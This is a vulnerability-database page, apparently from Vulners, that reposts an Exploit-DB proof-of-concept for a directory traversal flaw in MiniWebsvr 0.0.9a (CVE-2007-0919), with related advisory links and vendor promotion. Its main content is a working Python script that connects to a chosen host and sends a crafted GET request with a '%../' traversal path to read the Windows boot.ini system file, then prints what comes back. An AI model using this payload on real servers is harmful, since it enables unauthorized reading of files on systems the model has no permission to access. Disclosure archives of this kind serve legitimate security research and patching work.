Lucene search
+L

MiniWebsvr 0.0.9a - Remote Directory Traversal

🗓️ 03 Mar 2008 00:00:00Reported by gbrType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Remote Directory Traversal in MiniWebsvr 0.0.9

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2007-0919
3 Mar 200800:00
circl
cve
CVE
CVE-2007-0919
14 Feb 200711:00
cve
cvelist
Cvelist
CVE-2007-0919
14 Feb 200711:00
cvelist
exploitdb
Exploit DB
MiniWebsvr 0.0.7 - Remote Directory Traversal
11 Apr 200700:00
exploitdb
euvd
EUVD
EUVD-2007-0913
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-0919
14 Feb 200711:28
nvd
prion
Prion
Directory traversal
14 Feb 200711:28
prion
securityvulns
securityvulns
Miniwebsvr web server directory traversal
13 Feb 200700:00
securityvulns
import socket
import sys

print '---------------------------------------------------------'
print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
print 'Project URL: http://miniwebsvr.sourceforge.net/'
print 'Author: gbr'
print 'Tested on Windows XP SP2'
print '---------------------------------------------------------'

host = "127.0.0.1"
port = 8080

if sys.argv[1:]:
        host = sys.argv[1]
        if sys.argv[2:]:
                port = int(sys.argv[2])

try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
        while True:
                data = s.recv(4096)
                if not data:
                        break
                print data

except:
        print "Connection Error"

# milw0rm.com [2008-03-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.03648
30